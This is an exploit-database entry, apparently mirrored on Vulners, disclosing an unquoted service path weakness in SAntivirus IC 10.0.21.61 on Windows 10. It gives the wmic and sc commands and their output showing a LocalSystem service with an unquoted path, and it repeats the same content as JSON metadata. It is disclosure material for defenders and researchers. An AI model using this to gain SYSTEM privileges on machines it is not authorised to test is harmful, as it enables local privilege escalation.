Search...

SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path

2020-11-13T00:00:00

ID EDB-ID:49042
Type exploitdb
Reporter Exploit-DB
Modified 2020-11-13T00:00:00

Description

                                        
                                            # Exploit Title: SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path
# Discovery by: Mara Ramirez
# Discovery Date: 10-11-2020
# Vendor Homepage: https://www.segurazo.com/download.html
# Software Links : https://www.segurazo.com/download.html
# Tested Version: 10.0.21.61
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home Single Languaje 

# Step to discover Unquoted Service Path:

C:\&gt;wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """                                        SAntivirusIC                                                                              SAntivirusIC                       C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe -service  	Auto

C:\&gt;sc qc SAntivirusIC
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SAntivirusIC
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe -service
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : SAntivirusIC
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

JSON Vulners Source

Initial Source

{"id": "EDB-ID:49042", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path", "description": "", "published": "2020-11-13T00:00:00", "modified": "2020-11-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/49042", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2020-11-13T16:42:57", "viewCount": 423, "enchantments": {"dependencies": {"references": [], "modified": "2020-11-13T16:42:57", "rev": 2}, "score": {"value": 0.3, "vector": "NONE", "modified": "2020-11-13T16:42:57", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://www.exploit-db.com/download/49042", "sourceData": "# Exploit Title: SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path\r\n# Discovery by: Mara Ramirez\r\n# Discovery Date: 10-11-2020\r\n# Vendor Homepage: https://www.segurazo.com/download.html\r\n# Software Links : https://www.segurazo.com/download.html\r\n# Tested Version: 10.0.21.61\r\n# Vulnerability Type: Unquoted Service Path\r\n# Tested on OS: Windows 10 Home Single Languaje \r\n\r\n# Step to discover Unquoted Service Path:\r\n\r\nC:\\>wmic service get name, displayname, pathname, startmode | findstr /i \"auto\" | findstr /i /v \"C:\\Windows\\\\\" |findstr /i /v \"\"\" SAntivirusIC SAntivirusIC C:\\Program Files (x86)\\Digital Communications\\SAntivirus\\SAntivirusIC.exe -service \tAuto\r\n\r\nC:\\>sc qc SAntivirusIC\r\n[SC] QueryServiceConfig CORRECTO\r\n\r\nNOMBRE_SERVICIO: SAntivirusIC\r\n TIPO : 10 WIN32_OWN_PROCESS\r\n TIPO_INICIO : 2 AUTO_START\r\n CONTROL_ERROR : 1 NORMAL\r\n NOMBRE_RUTA_BINARIO: C:\\Program Files (x86)\\Digital Communications\\SAntivirus\\SAntivirusIC.exe -service\r\n GRUPO_ORDEN_CARGA :\r\n ETIQUETA : 0\r\n NOMBRE_MOSTRAR : SAntivirusIC\r\n DEPENDENCIAS :\r\n NOMBRE_INICIO_SERVICIO: LocalSystem", "osvdbidlist": []}

SAntivirus IC 10.0.21.61 - &#039;SAntivirusIC&#039; Unquoted Service Path

Description

SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path